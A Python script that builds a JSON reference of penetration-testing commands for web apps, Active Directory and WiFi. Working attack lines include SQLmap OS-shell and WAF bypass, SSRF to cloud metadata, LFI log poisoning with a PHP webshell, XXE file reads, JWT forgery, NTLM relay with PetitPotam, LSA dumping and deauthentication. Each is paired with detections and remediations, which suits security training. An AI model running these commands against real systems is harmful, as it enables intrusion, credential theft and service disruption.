#!/usr/bin/env python3
"""Bulk generator batch 2 — more VAPT commands."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== WEB TESTING BATCH 2 (30 new) =====================
WEB2 = [
e("ffuf-subdomain","ffuf","web_testing",4,LWM,"ffuf -u http://<target> -H 'Host: FUZZ.target.com' -w subdomains.txt -fs <size>","Subdomain via Host Header","Discovers virtual hosts by fuzzing Host header.",{"-H":"Custom Host header","-fs":"Filter default size"},"dev [200, 4521]\nstaging [200, 3892]","Find hidden vhosts on same IP.",["Target IP","Default response size known"],["T1595"],"Reconnaissance",["Unusual Host headers in logs"],["Reject unknown Host headers"],["Not filtering default response"],["gobuster vhost","wfuzz"],["https://github.com/ffuf/ffuf"],["vhost","subdomain","host-header","fuzzing"]),
e("sqlmap-os-shell","sqlmap","web_testing",4,LWM,"sqlmap -u 'http://<target>/page?id=1' --os-shell","SQLMap OS Shell","Attempts to get an operating system shell through SQL injection.",{"--os-shell":"Get OS command execution via SQLi"},"os-shell> whoami\nwww-data","Escalate SQL injection to full command execution on the server.",["Confirmed SQL injection","DBA privileges or FILE privilege"],["T1190","T1059"],"Execution",["Unusual file writes by DB process","Command execution from DB user"],["Least privilege for DB accounts","Disable FILE privilege"],["DB user doesn't have FILE privilege"],["manual INTO OUTFILE","xp_cmdshell (MSSQL)"],["https://sqlmap.org"],["sqli","rce","os-shell","command-execution"]),
e("sqlmap-tamper","sqlmap","web_testing",4,LWM,"sqlmap -u 'http://<target>/page?id=1' --tamper=space2comment,between --batch","SQLMap WAF Bypass (Tamper)","Uses tamper scripts to bypass WAF/IPS SQL injection filters.",{"--tamper":"Evasion scripts (comma-separated)"},"[*] WAF/IPS detected, using tamper scripts\n[+] Parameter 'id' is vulnerable","Bypass WAF rules that block standard SQL injection payloads.",["WAF blocking standard payloads"],["T1190"],"Initial Access",["Modified SQL patterns in WAF logs"],["Update WAF rules","Use parameterized queries"],["Not trying multiple tamper combinations"],["manual encoding","custom payloads"],["https://sqlmap.org"],["sqli","waf-bypass","tamper","evasion"]),
e("dalfox-xss","dalfox","web_testing",4,L,"dalfox url 'http://<target>/search?q=test' --blind <callback>","Advanced XSS Scanner","Next-gen XSS scanner with DOM analysis, blind XSS support, and WAF bypass.",{"url":"Target with parameter","--blind":"Blind XSS callback URL"},"[POC] http://target/search?q=<script>alert(1)</script>\n[VULN] Reflected XSS found","Find XSS vulnerabilities including blind and DOM-based variants.",["URL with reflectable parameter"],["T1059.007"],"Execution",["XSS payloads in WAF logs","CSP violation reports"],["CSP headers","Output encoding","Input sanitization"],["Only testing reflected (miss stored/DOM)"],["xsstrike","burp scanner"],["https://github.com/hahwul/dalfox"],["xss","dom","blind","scanner","advanced"]),
e("jwt-tool-crack","jwt_tool","web_testing",4,LWM,"python3 jwt_tool.py <token> -C -d /usr/share/wordlists/rockyou.txt","JWT Secret Cracking","Attempts to crack the JWT signing secret for token forgery.",{"-C":"Crack mode","-d":"Dictionary file"},"[+] SECRET FOUND: supersecret123\n[+] You can now forge tokens","Crack weak JWT secrets to forge authentication tokens.",["JWT token","Wordlist"],["T1078"],"Credential Access",["N/A — offline attack"],["Use strong random secrets (256+ bit)","Use asymmetric algorithms (RS256)"],["Token uses RS256 (can't crack)"],["hashcat -m 16500","john jwt"],["https://github.com/ticarpi/jwt_tool"],["jwt","token","cracking","authentication","forgery"]),
e("jwt-tool-forge","jwt_tool","web_testing",4,LWM,"python3 jwt_tool.py <token> -T -S hs256 -p 'secret' -I -pc role -pv admin","JWT Token Forgery","Forges a new JWT with modified claims using a known secret.",{"-T":"Tamper mode","-S":"Signing algorithm","-p":"Secret","-I":"Inject claims","-pc/-pv":"Claim name/value"},"[+] Forged token: eyJhbGciOiJIUzI1NiJ9...","Escalate privileges by modifying JWT claims (e.g., role: user → admin).",["Known JWT secret","Understanding of token claims"],["T1078"],"Privilege Escalation",["Token with unexpected claims","Admin actions from non-admin user"],["Validate claims server-side","Don't trust client tokens alone"],["Not understanding token structure"],["manual base64 editing + signing"],["https://github.com/ticarpi/jwt_tool"],["jwt","forgery","privilege-escalation","claims"]),
e("ssrf-basic","curl","web_testing",4,LWM,"curl 'http://<target>/fetch?url=http://169.254.169.254/latest/meta-data/'","SSRF — Cloud Metadata","Tests for Server-Side Request Forgery to access cloud instance metadata.",{"url parameter":"User-controlled URL that server fetches"},"ami-id: ami-12345\ninstance-type: t2.micro\niam-role: admin-role","Access cloud metadata service via SSRF — can reveal IAM credentials and instance info.",["URL parameter that fetches remote content","Target on cloud (AWS/GCP/Azure)"],["T1190","T1552"],"Initial Access",["Requests to 169.254.169.254 from application","Unusual internal requests"],["Block metadata IP in application","Use IMDSv2 (token required)","Input validation on URLs"],["Not trying different protocols (file://, gopher://)"],["manual testing with Burp"],["https://portswigger.net/web-security/ssrf"],["ssrf","cloud","metadata","aws","internal"]),
e("lfi-basic","curl","web_testing",4,LWM,"curl 'http://<target>/page?file=../../../../etc/passwd'","Local File Inclusion (LFI)","Tests for path traversal / local file inclusion to read server files.",{"file parameter":"Path traversal payload"},"root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:...","Read sensitive files from the server — /etc/passwd, config files, source code.",["File inclusion parameter","Linux target"],["T1005"],"Collection",["Path traversal patterns in logs (../)","Access to sensitive file paths"],["Input validation","Chroot/jail","Disable allow_url_include"],["Not trying enough ../ levels","Missing null byte (%00) for older PHP"],["dotdotpwn","burp intruder with traversal list"],["https://portswigger.net/web-security/file-path-traversal"],["lfi","path-traversal","file-read","inclusion"]),
e("lfi-to-rce","curl","web_testing",4,L,"curl 'http://<target>/page?file=/var/log/apache2/access.log' -A '<?php system($_GET[\"cmd\"]); ?>'","LFI to RCE (Log Poisoning)","Escalates LFI to Remote Code Execution by poisoning log files with PHP code.",{"-A":"User-Agent (injected into access log)","file=...access.log":"Include the poisoned log"},"# After poisoning:\ncurl 'http://target/page?file=/var/log/apache2/access.log&cmd=whoami'\nwww-data","Turn file read into code execution by injecting PHP into log files.",["Confirmed LFI","Log file path known","PHP enabled"],["T1059"],"Execution",["PHP code in User-Agent","Log file access via web"],["Restrict log file permissions","Disable allow_url_include","WAF rules"],["Log file path varies by distro","PHP not processing included file"],["php://filter wrapper","data:// wrapper"],["https://book.hacktricks.wiki/en/pentesting-web/file-inclusion"],["lfi","rce","log-poisoning","php","escalation"]),
e("idor-test","curl","web_testing",4,LWM,"curl -H 'Cookie: session=<your_token>' 'http://<target>/api/users/2'","IDOR Testing","Tests for Insecure Direct Object References by accessing other users' data.",{"Cookie":"Your session","users/2":"Another user's ID"},"{\n  \"id\": 2,\n  \"name\": \"Other User\",\n  \"email\": \"other@corp.com\",\n  \"ssn\": \"123-45-6789\"\n}","Access other users' data by changing ID parameters — extremely common vulnerability.",["Authenticated session","Predictable object IDs"],["T1530"],"Collection",["Access to objects not owned by user","Sequential ID access patterns"],["Implement authorization checks","Use UUIDs instead of sequential IDs","Validate object ownership"],["Only testing one endpoint","Not trying different HTTP methods"],["burp autorize extension","authmatrix"],["https://portswigger.net/web-security/access-control/idor"],["idor","authorization","access-control","broken-auth"]),
e("xxe-basic","curl","web_testing",4,LWM,"curl -X POST 'http://<target>/api/parse' -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><data>&xxe;</data>'","XXE Injection","Tests for XML External Entity injection to read server files.",{"Content-Type: application/xml":"XML content","<!ENTITY xxe SYSTEM>":"External entity definition","&xxe;":"Entity reference"},"root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:...","Read files, perform SSRF, or achieve RCE through XML parsing vulnerabilities.",["Endpoint accepting XML input"],["T1190"],"Initial Access",["XML parsing errors","External entity resolution attempts"],["Disable external entities in XML parser","Use JSON instead of XML","Input validation"],["Endpoint doesn't accept XML","Entity expansion disabled"],["burp collaborator (blind XXE)","oxml_xxe"],["https://portswigger.net/web-security/xxe"],["xxe","xml","injection","file-read","entity"]),
e("ssti-test","curl","web_testing",4,LWM,"curl 'http://<target>/page?name={{7*7}}'","SSTI Detection","Tests for Server-Side Template Injection by injecting template expressions.",{"{{7*7}}":"Jinja2/Twig expression (should return 49 if vulnerable)"},"Hello 49! (instead of Hello {{7*7}}!)","Detect template injection — can lead to RCE in frameworks like Flask/Jinja2, Django, Twig.",["Parameter reflected in page","Template engine in use"],["T1059"],"Execution",["Template syntax in parameters","Unusual server errors"],["Sandbox template engines","Don't pass user input to templates","Use logic-less templates"],["Not trying different template syntaxes (${}, #{}, <%)"],["tplmap (automated)","burp scanner"],["https://portswigger.net/web-security/server-side-template-injection"],["ssti","template","injection","rce","jinja2"]),
]

# ===================== ACTIVE DIRECTORY BATCH 2 (20 new) =====================
AD2 = [
e("impacket-smbexec","impacket","active_directory",6,L,"impacket-smbexec <domain>/<user>:<pass>@<target>","SMB Exec (Stealthier)","Executes commands via SMB without creating a service — stealthier than PsExec.",{"<domain>/<user>:<pass>@<target>":"Credentials and target"},"C:\\Windows\\system32>whoami\ncorp\\admin","Stealthier than PsExec — doesn't create a service binary on disk.",["Admin credentials","SMB access"],["T1021.002"],"Lateral Movement",["SMB file operations","Command execution patterns"],["Monitor SMB activity","Restrict admin shares"],["Slower than PsExec"],["impacket-psexec","impacket-wmiexec"],["https://github.com/fortra/impacket"],["smb","lateral-movement","stealth","execution"]),
e("impacket-dcomexec","impacket","active_directory",6,L,"impacket-dcomexec <domain>/<user>:<pass>@<target>","DCOM Remote Execution","Executes commands via DCOM (Distributed COM) — another lateral movement option.",{"<domain>/<user>:<pass>@<target>":"Credentials"},"C:\\Windows\\system32>whoami","Alternative to WMI/SMB execution — uses DCOM objects.",["Admin credentials","DCOM access (port 135 + dynamic)"],["T1021.003"],"Lateral Movement",["DCOM object instantiation events","Unusual process from DllHost.exe"],["Restrict DCOM access","Monitor DCOM usage"],["Firewall blocking dynamic ports"],["impacket-wmiexec","impacket-psexec"],["https://github.com/fortra/impacket"],["dcom","lateral-movement","remote-execution"]),
e("impacket-ntlmrelayx","impacket","active_directory",6,L,"impacket-ntlmrelayx -tf targets.txt -smb2support","NTLM Relay Attack","Relays captured NTLM authentication to other hosts — no cracking needed.",{"-tf":"Target file","-smb2support":"Support SMBv2"},"[*] HTTPD: Received connection from 10.0.0.50\n[*] Relaying to 10.0.0.10\n[*] Authenticated successfully as CORP\\admin","Relay authentication to gain access without knowing the password.",["Responder capturing auth","Targets without SMB signing"],["T1557.001"],"Credential Access",["NTLM auth from unexpected sources","Relay patterns in network traffic"],["Enable SMB signing on all hosts","Disable NTLM where possible"],["Target has SMB signing enforced"],["Responder (capture)","mitm6 (IPv6 relay)"],["https://github.com/fortra/impacket"],["ntlm-relay","mitm","authentication","lateral-movement"]),
e("rubeus-kerberoast","rubeus","active_directory",6,W,"Rubeus.exe kerberoast /outfile:hashes.txt","Rubeus Kerberoasting (Windows)","Windows-native Kerberoasting — requests TGS tickets for offline cracking.",{"/outfile":"Save hashes to file"},"[*] Found 5 SPNs\n[*] Hash written to hashes.txt","Kerberoast from a Windows machine without Python/Impacket.",["Domain user session on Windows","Rubeus binary"],["T1558.003"],"Credential Access",["TGS requests for multiple SPNs (Event 4769)","Rubeus binary detection"],["AES encryption for SPNs","Strong service passwords","gMSA"],["AV/EDR blocking Rubeus"],["impacket-GetUserSPNs (Linux)","PowerView"],["https://github.com/GhostPack/Rubeus"],["kerberoast","windows","rubeus","tgs","native"]),
e("rubeus-asreproast","rubeus","active_directory",6,W,"Rubeus.exe asreproast /outfile:asrep.txt","Rubeus AS-REP Roast (Windows)","Finds and roasts accounts without pre-auth from Windows.",{"/outfile":"Save hashes"},"[*] Found 2 users without pre-auth\n[*] Hashes written to asrep.txt","AS-REP Roast from Windows — finds vulnerable accounts automatically.",["Domain user session"],["T1558.004"],"Credential Access",["AS-REQ without pre-auth events"],["Enable pre-auth on all accounts"],["No accounts without pre-auth"],["impacket-GetNPUsers (Linux)"],["https://github.com/GhostPack/Rubeus"],["asrep","kerberos","windows","rubeus"]),
e("sharphound-collect","sharphound","active_directory",6,W,"SharpHound.exe -c All --outputdirectory C:\\temp\\","SharpHound Collection (Windows)","Windows-native BloodHound data collector — runs as current domain user.",{"-c All":"Collect all data types","--outputdirectory":"Output location"},"[*] Resolved Collection Methods: All\n[*] Collected 1532 users, 89 groups\n[*] Zip: 20240115_BloodHound.zip","Collect AD data from a Windows machine for BloodHound analysis.",["Domain user session","SharpHound binary"],["T1087","T1069"],"Discovery",["LDAP enumeration volume","SharpHound signatures in EDR"],["Monitor mass LDAP queries","EDR detection rules"],["EDR blocking execution","Not collecting all types"],["bloodhound-python (Linux)","ADExplorer"],["https://github.com/SpecterOps/BloodHound"],["bloodhound","collection","windows","active-directory"]),
e("powerview-enum","powerview","active_directory",6,W,"Import-Module .\\PowerView.ps1; Get-DomainUser -SPN | Select samaccountname,serviceprincipalname","PowerView SPN Enumeration","Finds service accounts with SPNs set — targets for Kerberoasting.",{"Get-DomainUser -SPN":"Find users with SPNs set"},"samaccountname    serviceprincipalname\nsvc_sql           MSSQLSvc/sql01.corp.local\nsvc_web           HTTP/web01.corp.local","Identify Kerberoastable service accounts using PowerView.",["PowerShell access","PowerView module"],["T1087.002"],"Discovery",["PowerShell script block logging","Module loading events"],["Monitor PowerShell execution","Constrained Language Mode"],["AMSI blocking PowerView"],["Get-ADUser -Filter {ServicePrincipalName -ne '$null'}"],["https://github.com/PowerShellMafia/PowerSploit"],["powerview","spn","enumeration","kerberoast","powershell"]),
e("netexec-winrm","netexec","active_directory",6,L,"netexec winrm <target_range> -u <user> -p <pass>","WinRM Access Check (Mass)","Checks WinRM access across multiple hosts — finds where you can get shells.",{"winrm":"WinRM protocol","<target_range>":"IP range or CIDR"},"WINRM 10.0.0.10 5985 PC01 [+] CORP\\admin:pass (Pwn3d!)","Quickly identify which hosts you can access via WinRM for lateral movement.",["Valid credentials","WinRM port 5985 open"],["T1021.006"],"Lateral Movement",["WinRM auth attempts across multiple hosts"],["Restrict Remote Management Users","Monitor WinRM access"],["User not in Remote Management Users group"],["evil-winrm","Enter-PSSession"],["https://github.com/Pennyw0rth/NetExec"],["winrm","mass-check","lateral-movement","access"]),
e("netexec-lsa","netexec","active_directory",6,L,"netexec smb <target> -u admin -p pass --lsa","Dump LSA Secrets","Remotely dumps LSA secrets including cached credentials and service account passwords.",{"--lsa":"Dump LSA secrets"},"CORP\\admin:$DCC2$...\nDPAPI_SYSTEM:...\n_SC_SQLService:SqlP@ss123","Extract cached domain credentials and service account passwords from LSA.",["Local admin on target","SMB access"],["T1003.004"],"Credential Access",["LSA access events","Remote registry access"],["Credential Guard","Monitor LSA access"],["Not having local admin"],["mimikatz lsadump::secrets","impacket-secretsdump"],["https://github.com/Pennyw0rth/NetExec"],["lsa","secrets","cached","credentials","dump"]),
e("petitpotam","petitpotam","active_directory",6,L,"python3 PetitPotam.py <listener_ip> <dc_ip>","PetitPotam (Coerce Auth)","Coerces the DC to authenticate to your machine — combine with ntlmrelayx for domain takeover.",{"<listener_ip>":"Your IP (running ntlmrelayx)","<dc_ip>":"Domain controller"},"[*] Triggering authentication from DC01...\n[+] DC01$ authenticated to our listener!","Force DC authentication for relay attacks — can lead to full domain compromise.",["Network access to DC","ntlmrelayx running"],["T1187"],"Credential Access",["EFS-related RPC calls from DC","NTLM auth from DC to non-DC"],["Patch PetitPotam","Enable EPA","Disable NTLM on DCs"],["DC already patched","SMB signing on DC"],["Coercer (multiple coercion methods)","PrinterBug"],["https://github.com/topotam/PetitPotam"],["coercion","ntlm","relay","domain-takeover","dc"]),
]

# ===================== WIRELESS & MISC (15 new) =====================
WIRELESS = [
e("aircrack-capture","aircrack-ng","wireless",6,L,"airodump-ng wlan0mon --bssid <AP_MAC> -c <channel> -w capture","Capture WPA Handshake","Captures WPA/WPA2 4-way handshake for offline cracking.",{"--bssid":"Target AP MAC","-c":"Channel","-w":"Output prefix"},"CH  6 ][ Elapsed: 2 min ][ WPA handshake: AA:BB:CC:DD:EE:FF","Capture the authentication handshake needed to crack WiFi passwords offline.",["Monitor mode interface","Target AP in range"],["T1040"],"Credential Access",["Deauth frames (if used)","Unusual monitor mode activity"],["Use WPA3","Strong passwords","802.1X enterprise"],["Not deauthing client to force handshake"],["wifite (automated)","bettercap"],["https://www.aircrack-ng.org"],["wifi","handshake","capture","wpa","wireless"]),
e("aircrack-crack","aircrack-ng","wireless",6,L,"aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt","Crack WPA Handshake (Aircrack)","Cracks captured WPA handshake using CPU-based dictionary attack.",{"-w":"Wordlist","capture-01.cap":"Capture file"},"KEY FOUND! [ Summer2024! ]","Crack WiFi passwords from captured handshakes — slower than hashcat but simpler.",["Captured handshake file","Wordlist"],["T1110.002"],"Credential Access",["N/A — offline"],["Strong WiFi passwords","WPA3"],["Weak wordlist","Password not in dictionary"],["hashcat -m 22000 (GPU, faster)"],["https://www.aircrack-ng.org"],["wifi","cracking","wpa","aircrack","offline"]),
e("bettercap-mitm","bettercap","wireless",6,L,"bettercap -iface wlan0 -eval 'wifi.recon on; wifi.deauth AA:BB:CC:DD:EE:FF'","WiFi Deauthentication","Sends deauth frames to force clients to reconnect — captures handshake on reconnection.",{"wifi.recon on":"Start WiFi recon","wifi.deauth":"Send deauth to target"},"[*] Deauthing client CC:DD:EE:FF:00:11\n[*] WPA handshake captured!","Force handshake capture by disconnecting clients from the AP.",["Monitor mode","Target AP and client in range"],["T1498"],"Impact",["Deauth frames detected by WIDS","Client disconnection events"],["Use 802.11w (management frame protection)","WIDS deployment"],["Deauthing wrong client","AP has 802.11w enabled"],["aireplay-ng --deauth","mdk4"],["https://www.bettercap.org"],["deauth","wifi","handshake","force","wireless"]),
e("nmap-vuln-scan","nmap","vulnerability_assessment",3,LWM,"nmap -sV --script vulners -p <ports> <target>","Vulners CVE Scan","Uses the vulners NSE script to check service versions against the Vulners CVE database.",{"--script vulners":"Vulners vulnerability database","-sV":"Version detection needed"},"| vulners:\n|   CVE-2021-44228  10.0  https://vulners.com/cve/CVE-2021-44228\n|   CVE-2023-22515  9.8   https://vulners.com/cve/CVE-2023-22515","Quick CVE lookup for discovered service versions — no separate vulnerability scanner needed.",["Service versions detected (-sV)"],["T1595"],"Reconnaissance",["Version probing in logs"],["Patch vulnerable services","Update regularly"],["Not running -sV first (vulners needs version info)"],["nuclei","searchsploit","OpenVAS"],["https://github.com/vulnersCom/nmap-vulners"],["cve","vulnerability","vulners","version","nse"]),
e("nikto-tuning","nikto","vulnerability_assessment",3,L,"nikto -h http://<target> -Tuning 1234567890abcde","Nikto Full Tuning Scan","Runs Nikto with all test categories enabled for maximum coverage.",{"-Tuning 1234567890abcde":"All test categories"},"+ /admin/: Admin panel found\n+ /backup.sql: Database backup exposed\n+ Server: Apache/2.4.52 (outdated)","Maximum coverage web vulnerability scan — checks everything Nikto knows about.",["Web server accessible"],["T1595"],"Reconnaissance",["Nikto user-agent","High 404 rate"],["Remove sensitive files","Update software","WAF"],["Running against CDN (gets blocked)"],["nuclei","whatweb"],["https://github.com/sullo/nikto"],["nikto","full-scan","vulnerability","web-server"]),
]

# ===================== SAVE =====================
def save(fn, data):
    path = OUTPUT_DIR / fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__ == "__main__":
    print("Bulk generate batch 2...")
    save("bulk2_web_testing.json", WEB2)
    save("bulk2_active_directory.json", AD2)
    save("bulk2_wireless_misc.json", WIRELESS)
    total = 0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total += len(json.load(fp))
    print(f"\nTOTAL: {total}")
